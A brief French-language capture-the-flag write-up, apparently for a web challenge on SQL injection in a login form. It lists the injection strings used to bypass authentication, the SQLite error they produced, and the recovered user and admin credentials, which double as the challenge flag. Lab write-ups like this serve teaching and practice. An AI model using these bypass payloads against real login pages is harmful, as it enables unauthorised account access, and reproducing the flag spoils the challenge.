Aller au contenu

SQL injection Authentification

Lien du CTF

Solution

Test en entrant une injection sql dans login et password : 

' OR 1=1

Warning: SQLite3::query(): Unable to prepare statement: 1, near "' and password='' OR 1=1'": syntax error in /challenge/web-serveur/ch9/index.php on line 38
near "' and password='' OR 1=1'": syntax error

Rend la condition tout le temps vraie mais ne sors que le premier user: 

' OR '1=1

- username : user1
- password : TYsgv75zgtq

Permet de forcer l'ulisation du user admin 

' OR username ='admin 

- username : admin
- password : t0_W34k!$

Flag : t0_W34k!$